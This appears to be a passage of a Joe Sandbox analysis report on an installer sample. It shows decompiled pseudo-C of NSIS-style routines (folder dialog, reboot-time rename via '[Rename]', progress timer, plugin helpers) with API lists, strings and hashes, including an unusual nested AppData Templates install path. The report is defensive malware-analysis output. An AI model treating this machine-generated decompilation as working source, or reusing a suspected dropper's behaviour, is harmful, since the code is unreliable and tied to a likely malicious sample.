                                                            										continue;
                                                            									} else {
                                                            										goto L30;
                                                            									}
                                                            								}
                                                            								_t150 = _v44;
                                                            								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                            								_v44 = _t150 >> 0xa;
                                                            								_v12 = 1;
                                                            								_t158 = 0;
                                                            								__eflags = 0;
                                                            								L35:
                                                            								_t168 = 0x400;
                                                            								L36:
                                                            								_t95 = E00404BFA(5);
                                                            								if(_v12 != _t158) {
                                                            									_t197 = _v44;
                                                            									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                            										_v8 = 2;
                                                            									}
                                                            								}
                                                            								if( *((intOrPtr*)( *0x44e3fc + 0x10)) != _t158) {
                                                            									E00404BE2(0x3ff, 0xfffffffb, _t95);
                                                            									if(_v12 == _t158) {
                                                            										SetDlgItemTextA(_a4, _t168, 0x434050);
                                                            									} else {
                                                            										E00404B1D(_t168, 0xfffffffc, _v48, _v44);
                                                            									}
                                                            								}
                                                            								_t96 = _v8;
                                                            								 *0x4524c4 = _t96;
                                                            								if(_t96 == _t158) {
                                                            									_v8 = E0040140B(7);
                                                            								}
                                                            								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                            									_v8 = _t158;
                                                            								}
                                                            								E004042F6(0 | _v8 == _t158);
                                                            								if(_v8 == _t158 &&  *0x43c080 == _t158) {
                                                            									E004046BF();
                                                            								}
                                                            								 *0x43c080 = _t158;
                                                            								goto L53;
                                                            							}
                                                            						}
                                                            						_t185 = _a8 - 0x405;
                                                            						if(_a8 != 0x405) {
                                                            							goto L53;
                                                            						}
                                                            						goto L22;
                                                            					}
                                                            					_t118 = _a12 & 0x0000ffff;
                                                            					if(_t118 != 0x3fb) {
                                                            						L12:
                                                            						if(_t118 == 0x3e9) {
                                                            							_t152 = 7;
                                                            							memset( &_v76, 0, _t152 << 2);
                                                            							_v80 = _t166;
                                                            							_v72 = 0x43c090;
                                                            							_v60 = E00404AB7;
                                                            							_v56 = _t146;
                                                            							_v68 = E004062EA(_t146, 0x43c090, _t166, 0x436068, _v12);
                                                            							_t122 =  &_v80;
                                                            							_v64 = 0x41;
                                                            							__imp__SHBrowseForFolderA(_t122);
                                                            							if(_t122 == 0) {
                                                            								_a8 = 0x40f;
                                                            							} else {
                                                            								__imp__CoTaskMemFree(_t122);
                                                            								E00405BE9(_t146);
                                                            								_t125 =  *((intOrPtr*)( *0x452430 + 0x11c));
                                                            								if( *((intOrPtr*)( *0x452430 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes") {
                                                            									E004062EA(_t146, 0x43c090, _t166, 0, _t125);
                                                            									if(lstrcmpiA(0x44a3c0, 0x43c090) != 0) {
                                                            										lstrcatA(_t146, 0x44a3c0);
                                                            									}
                                                            								}
                                                            								 *0x43c080 =  *0x43c080 + 1;
                                                            								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                            							}
                                                            						}
                                                            						goto L20;
                                                            					}
                                                            					if(_a12 >> 0x10 != 0x300) {
                                                            						goto L53;
                                                            					}
                                                            					_a8 = 0x40f;
                                                            					goto L12;
                                                            				} else {
                                                            					_t165 = GetDlgItem(_t166, 0x3fb);
                                                            					if(E00405C56(_t146) != 0 && E00405C82(_t146) == 0) {
                                                            						E00405BE9(_t146);
                                                            					}
                                                            					 *0x44e3f8 = _t166;
                                                            					SetWindowTextA(_t165, _t146);
                                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                            					_push(1);
                                                            					E004042D4(_t166);
                                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                            					_push(0x14);
                                                            					E004042D4(_t166);
                                                            					E00404309(_t165);
                                                            					_t138 = E00406663(8);
                                                            					if(_t138 == 0) {
                                                            						L53:
                                                            						return E0040433B(_a8, _a12, _a16);
                                                            					} else {
                                                            						 *_t138(_t165, 1);
                                                            						goto L8;
                                                            					}
                                                            				}
                                                            			}














































                                                            APIs
                                                            • GetDlgItem.USER32(?,000003FB), ref: 004047B5
                                                            • SetWindowTextA.USER32(00000000,?), ref: 004047DF
                                                            • SHBrowseForFolderA.SHELL32(?,00436068,?), ref: 00404890
                                                            • CoTaskMemFree.OLE32(00000000), ref: 0040489B
                                                            • lstrcmpiA.KERNEL32(Copy failed,0043C090,00000000,?,?), ref: 004048CD
                                                            • lstrcatA.KERNEL32(?,Copy failed), ref: 004048D9
                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004048EB
                                                              • Part of subcall function 00405951: GetDlgItemTextA.USER32 ref: 00405964
                                                              • Part of subcall function 00406535: CharNextA.USER32(0000000B), ref: 0040658D
                                                              • Part of subcall function 00406535: CharNextA.USER32(0000000B), ref: 0040659A
                                                              • Part of subcall function 00406535: CharNextA.USER32(0000000B), ref: 0040659F
                                                              • Part of subcall function 00406535: CharPrevA.USER32(0000000B,0000000B), ref: 004065AF
                                                            • GetDiskFreeSpaceA.KERNEL32(00434060,?,?,0000040F,?,00434060,00434060,?,00000001,00434060,?,?,000003FB,?), ref: 004049A9
                                                            • MulDiv.KERNEL32 ref: 004049C4
                                                              • Part of subcall function 00404B1D: lstrlenA.KERNEL32(0043C090,0043C090,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                              • Part of subcall function 00404B1D: wsprintfA.USER32 ref: 00404BC3
                                                              • Part of subcall function 00404B1D: SetDlgItemTextA.USER32(?,0043C090), ref: 00404BD6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$Copy failed$`@C
                                                            • API String ID: 2624150263-2532524891
                                                            • Opcode ID: 716a1688ca695c3a3c546a5cfd34f8cd1780d97e0ef75404fa2bc64f02add2a4
                                                            • Instruction ID: 1e5cde7c6216eed5206fee0a992a61c18a0705ae5e449ea6cb8cf0fac14b4d51
                                                            • Opcode Fuzzy Hash: 716a1688ca695c3a3c546a5cfd34f8cd1780d97e0ef75404fa2bc64f02add2a4
                                                            • Instruction Fuzzy Hash: 74A16EB1A00209ABDB11AFA6CD41BAF77B8AF84314F10847BF601B62D1D77C99418F6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405EC0(void* __ecx) {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				long _t12;
                                                            				long _t24;
                                                            				char* _t31;
                                                            				int _t37;
                                                            				void* _t38;
                                                            				intOrPtr* _t39;
                                                            				long _t42;
                                                            				CHAR* _t44;
                                                            				void* _t46;
                                                            				void* _t48;
                                                            				void* _t49;
                                                            				void* _t52;
                                                            				void* _t53;
                                                            
                                                            				_t38 = __ecx;
                                                            				_t44 =  *(_t52 + 0x14);
                                                            				 *0x448620 = 0x4c554e;
                                                            				if(_t44 == 0) {
                                                            					L3:
                                                            					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x448a20, 0x400);
                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                            						_t37 = wsprintfA(0x448220, "%s=%s\r\n", 0x448620, 0x448a20);
                                                            						_t53 = _t52 + 0x10;
                                                            						E004062EA(_t37, 0x400, 0x448a20, 0x448a20,  *((intOrPtr*)( *0x452430 + 0x128)));
                                                            						_t12 = E00405DEA(0x448a20, 0xc0000000, 4);
                                                            						_t48 = _t12;
                                                            						 *(_t53 + 0x18) = _t48;
                                                            						if(_t48 != 0xffffffff) {
                                                            							_t42 = GetFileSize(_t48, 0);
                                                            							_t6 = _t37 + 0xa; // 0xa
                                                            							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                            							if(_t46 == 0 || E00405E62(_t48, _t46, _t42) == 0) {
                                                            								L18:
                                                            								return CloseHandle(_t48);
                                                            							} else {
                                                            								if(E00405D4F(_t38, _t46, "[Rename]\r\n") != 0) {
                                                            									_t49 = E00405D4F(_t38, _t21 + 0xa, 0x40a3d8);
                                                            									if(_t49 == 0) {
                                                            										_t48 =  *(_t53 + 0x18);
                                                            										L16:
                                                            										_t24 = _t42;
                                                            										L17:
                                                            										E00405DA5(_t24 + _t46, 0x448220, _t37);
                                                            										SetFilePointer(_t48, 0, 0, 0);
                                                            										E00405E91(_t48, _t46, _t42 + _t37);
                                                            										GlobalFree(_t46);
                                                            										goto L18;
                                                            									}
                                                            									_t39 = _t46 + _t42;
                                                            									_t31 = _t39 + _t37;
                                                            									while(_t39 > _t49) {
                                                            										 *_t31 =  *_t39;
                                                            										_t31 = _t31 - 1;
                                                            										_t39 = _t39 - 1;
                                                            									}
                                                            									_t24 = _t49 - _t46 + 1;
                                                            									_t48 =  *(_t53 + 0x18);
                                                            									goto L17;
                                                            								}
                                                            								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                            								_t42 = _t42 + 0xa;
                                                            								goto L16;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					CloseHandle(E00405DEA(_t44, 0, 1));
                                                            					_t12 = GetShortPathNameA(_t44, 0x448620, 0x400);
                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                            						goto L3;
                                                            					}
                                                            				}
                                                            				return _t12;
                                                            			}




















                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000), ref: 00405EF1
                                                            • GetShortPathNameA.KERNEL32 ref: 00405EFA
                                                              • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                              • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                            • GetShortPathNameA.KERNEL32 ref: 00405F17
                                                            • wsprintfA.USER32 ref: 00405F35
                                                            • GetFileSize.KERNEL32(00000000,00000000,00448A20,C0000000,00000004,00448A20,?,?,?,?,?), ref: 00405F70
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7F
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB7
                                                            • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,00448220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 0040600D
                                                            • GlobalFree.KERNEL32(00000000), ref: 0040601E
                                                            • CloseHandle.KERNEL32(00000000), ref: 00406025
                                                              • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,00489000,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                              • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E10
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                            • String ID: %s=%s$[Rename]
                                                            • API String ID: 2171350718-1727408572
                                                            • Opcode ID: 86c75f9ffb992eab75565988558f4edcfd0a1f7ba9e91908d43dc06201ce60aa
                                                            • Instruction ID: a927ddba45d5df7a47f9583d2fa9cd5bb3fc37aebfc63fa68c1436a548016810
                                                            • Opcode Fuzzy Hash: 86c75f9ffb992eab75565988558f4edcfd0a1f7ba9e91908d43dc06201ce60aa
                                                            • Instruction Fuzzy Hash: 7C310531200B166BC2207B659D48F6B7A9CEF49758F15043FFA42F62D2DB7CD8118AAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040433B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                            				struct tagLOGBRUSH _v16;
                                                            				long _t39;
                                                            				long _t41;
                                                            				void* _t44;
                                                            				signed char _t50;
                                                            				long* _t54;
                                                            
                                                            				if(_a4 + 0xfffffecd > 5) {
                                                            					L18:
                                                            					return 0;
                                                            				}
                                                            				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                            				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                            					goto L18;
                                                            				} else {
                                                            					_t50 = _t54[5];
                                                            					if((_t50 & 0xffffffe0) != 0) {
                                                            						goto L18;
                                                            					}
                                                            					_t39 =  *_t54;
                                                            					if((_t50 & 0x00000002) != 0) {
                                                            						_t39 = GetSysColor(_t39);
                                                            					}
                                                            					if((_t54[5] & 0x00000001) != 0) {
                                                            						SetTextColor(_a8, _t39);
                                                            					}
                                                            					SetBkMode(_a8, _t54[4]);
                                                            					_t41 = _t54[1];
                                                            					_v16.lbColor = _t41;
                                                            					if((_t54[5] & 0x00000008) != 0) {
                                                            						_t41 = GetSysColor(_t41);
                                                            						_v16.lbColor = _t41;
                                                            					}
                                                            					if((_t54[5] & 0x00000004) != 0) {
                                                            						SetBkColor(_a8, _t41);
                                                            					}
                                                            					if((_t54[5] & 0x00000010) != 0) {
                                                            						_v16.lbStyle = _t54[2];
                                                            						_t44 = _t54[3];
                                                            						if(_t44 != 0) {
                                                            							DeleteObject(_t44);
                                                            						}
                                                            						_t54[3] = CreateBrushIndirect( &_v16);
                                                            					}
                                                            					return _t54[3];
                                                            				}
                                                            			}










                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                            • Instruction ID: d64fbe2596ca860a271eaf52242e9b3e10407c8dba4713a28e38d7cfcaef20bb
                                                            • Opcode Fuzzy Hash: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
                                                            • Instruction Fuzzy Hash: 822174716007049FCB30DF68D908B5BBBF8AF81710B04892EED96A26E1C734D915CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E73C32128(intOrPtr* _a4) {
                                                            				short _v84;
                                                            				intOrPtr* _t24;
                                                            				signed int _t25;
                                                            				intOrPtr _t26;
                                                            				intOrPtr _t33;
                                                            				void* _t39;
                                                            				void* _t42;
                                                            
                                                            				_t39 = E73C312C6();
                                                            				_t24 = _a4;
                                                            				_t33 =  *((intOrPtr*)(_t24 + 0x814));
                                                            				_t42 = (_t33 + 0x41 << 5) + _t24;
                                                            				do {
                                                            					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
                                                            					}
                                                            					_t25 =  *(_t42 - 8) & 0x000000ff;
                                                            					if(_t25 <= 7) {
                                                            						switch( *((intOrPtr*)(_t25 * 4 +  &M73C32268))) {
                                                            							case 0:
                                                            								 *_t39 = 0;
                                                            								goto L17;
                                                            							case 1:
                                                            								__edx =  *__edx;
                                                            								if(__ecx > 0) {
                                                            									__ecx = __ecx - 1;
                                                            									__ecx = __ecx *  *(0x73c34060 + __eax * 4);
                                                            									asm("sbb eax, eax");
                                                            									__edx = __edx &  *(0x73c34080 + __eax * 4);
                                                            								}
                                                            								_push(__edx);
                                                            								goto L15;
                                                            							case 2:
                                                            								_push(__edi);
                                                            								_push(__edx[1]);
                                                            								_push( *__edx);
                                                            								__eax = E73C3144D(__ecx);
                                                            								goto L16;
                                                            							case 3:
                                                            								__eax = lstrcpynA(__edi,  *__edx,  *0x73c35040);
                                                            								goto L17;
                                                            							case 4:
                                                            								__ecx =  *0x73c35040;
                                                            								__ecx - 1 = WideCharToMultiByte(0, 0,  *__edx, __ecx, __edi, __ecx - 1, 0, 0);
                                                            								__eax =  *0x73c35040;
                                                            								 *((char*)(__eax + __edi - 1)) = 0;
                                                            								goto L17;
                                                            							case 5:
                                                            								_push(0x27);
                                                            								__eax =  &_v84;
                                                            								_push( &_v84);
                                                            								_push( *__edx);
                                                            								__imp__StringFromGUID2();
                                                            								__ecx = 0;
                                                            								__eax =  &_v84;
                                                            								__eax = WideCharToMultiByte(0, 0,  &_v84,  &_v84, __edi,  *0x73c35040, 0, 0);
                                                            								goto L17;
                                                            							case 6:
                                                            								_push( *__esi);
                                                            								L15:
                                                            								__eax = wsprintfA(__edi, 0x73c34058);
                                                            								L16:
                                                            								__esp = __esp + 0xc;
                                                            								goto L17;
                                                            						}
                                                            					}
                                                            					L17:
                                                            					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
                                                            						GlobalFree( *(_t42 + 0x14));
                                                            					}
                                                            					_t26 =  *((intOrPtr*)(_t42 + 0xc));
                                                            					if(_t26 != 0) {
                                                            						if(_t26 != 0xffffffff) {
                                                            							if(_t26 > 0) {
                                                            								E73C315C7(_t26 - 1, _t39);
                                                            								goto L26;
                                                            							}
                                                            						} else {
                                                            							E73C3157E(_t39);
                                                            							L26:
                                                            						}
                                                            					}
                                                            					_t42 = _t42 - 0x20;
                                                            					_t33 = _t33 - 1;
                                                            				} while (_t33 >= 0);
                                                            				return GlobalFree(_t39);
                                                            			}











                                                            APIs
                                                              • Part of subcall function 73C312C6: GlobalAlloc.KERNELBASE(00000040,73C311C4,-000000A0), ref: 73C312CE
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C32228
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C3225D
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            • Associated: 00000010.00000002.1284008674.0000000073C30000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000010.00000002.1284039391.0000000073C34000.00000002.00000001.01000000.00000008.sdmp
                                                            • Associated: 00000010.00000002.1284051137.0000000073C36000.00000002.00000001.01000000.00000008.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: 2d4d8a017e0ce906edc8196db2defb5fa6904fce3a30cc7c4a1a9e1b35b857ae
                                                            • Instruction ID: cf5c5f2219e01ad68347a77add7b0231ebfe3b4f46f42246f5a33aeae5b11193
                                                            • Opcode Fuzzy Hash: 2d4d8a017e0ce906edc8196db2defb5fa6904fce3a30cc7c4a1a9e1b35b857ae
                                                            • Instruction Fuzzy Hash: 9641067220824CEFEB169F56CD85FAA7BB9FB46710F954119E905DA180D732BC40CBA3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404C27(struct HWND__* _a4, intOrPtr _a8) {
                                                            				long _v8;
                                                            				signed char _v12;
                                                            				unsigned int _v16;
                                                            				void* _v20;
                                                            				intOrPtr _v24;
                                                            				long _v56;
                                                            				void* _v60;
                                                            				long _t15;
                                                            				unsigned int _t19;
                                                            				signed int _t25;
                                                            				struct HWND__* _t28;
                                                            
                                                            				_t28 = _a4;
                                                            				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                            				if(_a8 == 0) {
                                                            					L4:
                                                            					_v56 = _t15;
                                                            					_v60 = 4;
                                                            					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                            					return _v24;
                                                            				}
                                                            				_t19 = GetMessagePos();
                                                            				_v16 = _t19 >> 0x10;
                                                            				_v20 = _t19;
                                                            				ScreenToClient(_t28,  &_v20);
                                                            				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                            				if((_v12 & 0x00000066) != 0) {
                                                            					_t15 = _v8;
                                                            					goto L4;
                                                            				}
                                                            				return _t25 | 0xffffffff;
                                                            			}















                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$ClientScreen
                                                            • String ID: f
                                                            • API String ID: 41195575-1993550816
                                                            • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                            • Instruction ID: 6a0354fd0873e2a66e4e803e7b6bfaf8a717de4a4c12bc6328b4bc3a065c57a7
                                                            • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                            • Instruction Fuzzy Hash: DB015E71900219BAEB00DBA4DD85BFFBBBCAF55B25F10012BBB40B61D0C7B499018BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00402E25(struct HWND__* _a4, intOrPtr _a8) {
                                                            				char _v68;
                                                            				int _t11;
                                                            				int _t20;
                                                            
                                                            				if(_a8 == 0x110) {
                                                            					SetTimer(_a4, 1, 0xfa, 0);
                                                            					_a8 = 0x113;
                                                            				}
                                                            				if(_a8 == 0x113) {
                                                            					_t20 =  *0x426040; // 0xa399b
                                                            					_t11 =  *0x43204c;
                                                            					if(_t20 >= _t11) {
                                                            						_t20 = _t11;
                                                            					}
                                                            					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                            					SetWindowTextA(_a4,  &_v68);
                                                            					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                            				}
                                                            				return 0;
                                                            			}







                                                            APIs
                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E40
                                                            • MulDiv.KERNEL32 ref: 00402E6B
                                                            • wsprintfA.USER32 ref: 00402E7B
                                                            • SetWindowTextA.USER32(?,?), ref: 00402E8B
                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E9D
                                                            Strings
                                                            • verifying installer: %d%%, xrefs: 00402E75
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                            • String ID: verifying installer: %d%%
                                                            • API String ID: 1451636040-82062127
                                                            • Opcode ID: 18484903bc97b0010b799efdcc2969c9f7184eca579189d06c0e917a59186ed5
                                                            • Instruction ID: d1e0a2a93c5684a536d9419adbf701d81bd0aa6c2e01a71bf08629b566d4acbd
                                                            • Opcode Fuzzy Hash: 18484903bc97b0010b799efdcc2969c9f7184eca579189d06c0e917a59186ed5
                                                            • Instruction Fuzzy Hash: 4A016270640209FBEF209F60DE09EAE3769EB04344F008039FA06B51D0DBB89955CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E73C31F58(void* _a4) {
                                                            				signed int _v4;
                                                            				signed int _v8;
                                                            				signed int _t46;
                                                            				void* _t47;
                                                            				signed int _t48;
                                                            				void* _t49;
                                                            				void* _t52;
                                                            				void* _t56;
                                                            				signed int _t57;
                                                            				signed int _t59;
                                                            				void* _t60;
                                                            
                                                            				_t52 = _a4;
                                                            				_t46 = 0 |  *((intOrPtr*)(_t52 + 0x814)) > 0x00000000;
                                                            				while(1) {
                                                            					_v8 = _t46;
                                                            					_t59 = _t46 << 5;
                                                            					_t60 =  *(_t59 + _t52 + 0x830);
                                                            					if(_t60 == 0 || _t60 == 0x1a) {
                                                            						goto L8;
                                                            					}
                                                            					if(_t60 != 0xffffffff) {
                                                            						_t51 = _t60 - 1;
                                                            						if(_t60 - 1 > 0x18) {
                                                            							 *(_t59 + _t52 + 0x830) = 0x1a;
                                                            							L11:
                                                            							_t56 = _t59 + _t52;
                                                            							if( *((intOrPtr*)(_t59 + _t52 + 0x81c)) >= 0) {
                                                            							}
                                                            							_t48 =  *(_t59 + _t52 + 0x818) & 0x000000ff;
                                                            							 *(_t59 + _t52 + 0x834) =  *(_t59 + _t52 + 0x834) & 0x00000000;
                                                            							_v4 = _t48;
                                                            							if(_t48 > 7) {
                                                            								L28:
                                                            								_t49 = GlobalFree(_t60);
                                                            								_t57 = _v8;
                                                            								if(_t57 == 0) {
                                                            									return _t49;
                                                            								}
                                                            								_t43 = _t57 + 1; // 0x2
                                                            								_t55 =  !=  ? _t43 : 0;
                                                            								_t46 =  !=  ? _t43 : 0;
                                                            								continue;
                                                            							} else {
                                                            								switch( *((intOrPtr*)(_t48 * 4 +  &M73C32108))) {
                                                            									case 0:
                                                            										 *(_t56 + 0x820) =  *(_t56 + 0x820) & 0x00000000;
                                                            										goto L28;
                                                            									case 1:
                                                            										_push(__esi);
                                                            										__eax = E73C31326();
                                                            										_pop(__ecx);
                                                            										goto L18;
                                                            									case 2:
                                                            										_push(__esi);
                                                            										__eax = E73C31326();
                                                            										_pop(__ecx);
                                                            										 *__ebp = __eax;
                                                            										_a4 = __edx;
                                                            										goto L28;
                                                            									case 3:
                                                            										__eax = E73C312AF(__esi);
                                                            										goto L21;
                                                            									case 4:
                                                            										 *0x73c35040 =  *0x73c35040 +  *0x73c35040;
                                                            										__eax = GlobalAlloc(0x40,  *0x73c35040 +  *0x73c35040);
                                                            										__ecx =  *0x73c35040;
                                                            										_a4 = __eax;
                                                            										__eax = MultiByteToWideChar(0, 0, __esi,  *0x73c35040, __eax,  *0x73c35040);
                                                            										if(_v4 != 5) {
                                                            											__eax = _a4;
                                                            											L21:
                                                            											 *(__edi + __ebx + 0x834) = __eax;
                                                            											L18:
                                                            											 *__ebp = __eax;
                                                            											goto L28;
                                                            										}
                                                            										__eax = GlobalAlloc(0x40, 0x10);
                                                            										 *(__edi + __ebx + 0x834) = __eax;
                                                            										__edi = _a4;
                                                            										_push(__eax);
                                                            										_push(__edi);
                                                            										 *__ebp = __eax;
                                                            										__imp__CLSIDFromString();
                                                            										__eax = GlobalFree(__edi);
                                                            										goto L28;
                                                            									case 5:
                                                            										if( *__esi != 0) {
                                                            											_push(__esi);
                                                            											__eax = E73C31326();
                                                            											 *(__edi + __ebx + 0x820) = __eax;
                                                            										}
                                                            										goto L28;
                                                            									case 6:
                                                            										 *(__edi + __ebx + 0x830) =  *(__edi + __ebx + 0x830) - 1;
                                                            										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x73c35040;
                                                            										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x73c35040 +  *0x73c35038;
                                                            										_push(__ecx);
                                                            										__eax = __ecx + 0xc;
                                                            										 *(__edx + 0x820) = __eax;
                                                            										asm("cdq");
                                                            										_push(__edx);
                                                            										_push(__eax);
                                                            										__eax = E73C3144D(__ecx);
                                                            										__esp = __esp + 0xc;
                                                            										goto L28;
                                                            								}
                                                            							}
                                                            						}
                                                            						_t47 = E73C314E2(_t51);
                                                            						L9:
                                                            						L10:
                                                            						_t60 = _t47;
                                                            						goto L11;
                                                            					}
                                                            					_t47 = E73C3152B();
                                                            					goto L10;
                                                            					L8:
                                                            					_t47 = E73C312AF(0x73c340c7);
                                                            					goto L9;
                                                            				}
                                                            			}















                                                            APIs
